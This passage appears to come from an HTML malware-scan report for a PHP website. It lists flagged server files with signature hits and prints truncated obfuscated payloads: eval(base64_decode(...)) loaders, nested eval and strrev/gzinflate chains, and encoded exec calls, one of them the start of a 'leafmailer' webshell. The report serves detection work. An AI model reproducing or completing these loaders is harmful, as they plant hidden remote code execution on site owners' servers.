<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 162cf671 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 162cf671)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">hcnJheV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 407651f7 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 407651f7)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">wcmludG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">aW5jbHVkZ</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7186bb8d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7186bb8d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RfUE9TV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">N0cl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7f5d33bf <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7f5d33bf)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">JF9SRVFVRVNU</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">leGVjK</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">pbmNsdWRl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">c3Rhd</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3Blb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Z1bmN0aW9u</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VjaG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign e6546205 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: e6546205)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">kX1BPU1</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ee1cb326 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ee1cb326)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">9wZW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ff4f5344 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ff4f5344)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FycmF5X</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_102").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/lrctx.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 70.78 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:17:23</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:17:23</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_103" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOExMemc3NS9...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5F</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">"; eval(</span><span style="color: #0000BB">$o</span><span style="color: #DD0000">("</span><span style="color: #0000BB">CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$o</span><span style="color: #007700">(</span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOEx...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">laVE</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev exec_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cExE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3BLb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"base64_decode"</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_103").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/jnllw.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 52.73 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:17:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:17:21</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_104" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwRtF3uTXMQDYJ2O8umyGtGsMsdkHxFjTSqmY1beQbJ7x0Ls9WyJ6ASK9QrEzGTf7IdPIPre8mqhI9eodyFMNj9YGRJDn4CcfJ2kg2eIoDbWPphXTbRPGymWPdoz2ZTpl06XQOtLLx7gsxvK3Irk9BTH1PqIsFBobKuAAvoc0SoCKu93DeTNctdZDxvZmgGsswABEIsOaUOsA2MUKfu9SxAH8JNoIXBOCmP6yV9cgTI617pcLxXozLLp4CBgY6DKMgckypa8MEWDrpi0uDksDJcp9nY1MVP05l9w4HNHAr3s0crA8C0jhvHHHTYlLPxeNcFoVSCkMXiWORKVrbYrMaYRShWQq0pJFhNkC7vDJ1G0TBv51pj82gTS...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strrev</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">$_xwynUOL</span><span style="color: #007700">(</span><span style="color: #0000BB">_6Zys</span><span style="color: #007700">(</span><span style="color: #0000BB">$_cCzFdr</span><span style="color: #007700">))));}eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(</span><span style="color: #0000BB">_r5Me0FNrh83UY9xZt</span><span style="color: #007700">(</span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwR</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2P</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function str_rot13 exec_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RkRP</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 80e70adc <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 80e70adc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700"><?</span><span style="color: #0000BB">php<br /></span><span style="color: #007700">eval</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ldmFs</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">V2YW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_104").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/images/images/images/images/images/images/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:09</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:09</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_105" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'42OKh3B8HFEbF+2DrlT1QGhseGjXWH75sd3Dje/FZu48HPekFP8a8HnaEd/s6ve91Bz0LHe0xvV91Y9JV+FNvG7GYXKdDXue9w4z3s54/fatHu21f8iXu8t7m413u8xlKw1jsXj3M5rNeV0xnK+yGZF16bjzYvb2+y/ffR+Rf833YGNKJ8HzU4KFcXzC5MSL9nNd+P6Uzq+8idODRgeQ9SRvuFGs+NYsMCwbmeBEGlXs5wJl6K/7XdWPslTUSP5/AZBfKTojoXmB09wESCxNSNGGIDMMdoIZZaI8c3GmhVS9VYc4/2vvYsOEzgeuj0QloAM9+Bu7G62bVcvpUx2A/z3tZwmvs5CzuuhvfsSWveVqpIzQPUdO+OHtct5fRG95I//jJ68nb36VL++bnGDrLcCRxaQ1d1EbxuedaFtDsvanNhEvHRBtbq++bi6/2v3HeGaHRfFkZNqgMkgHbPKGI60NuqPGY2ZEPm3r4J8zt0rJaYNpjnV...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
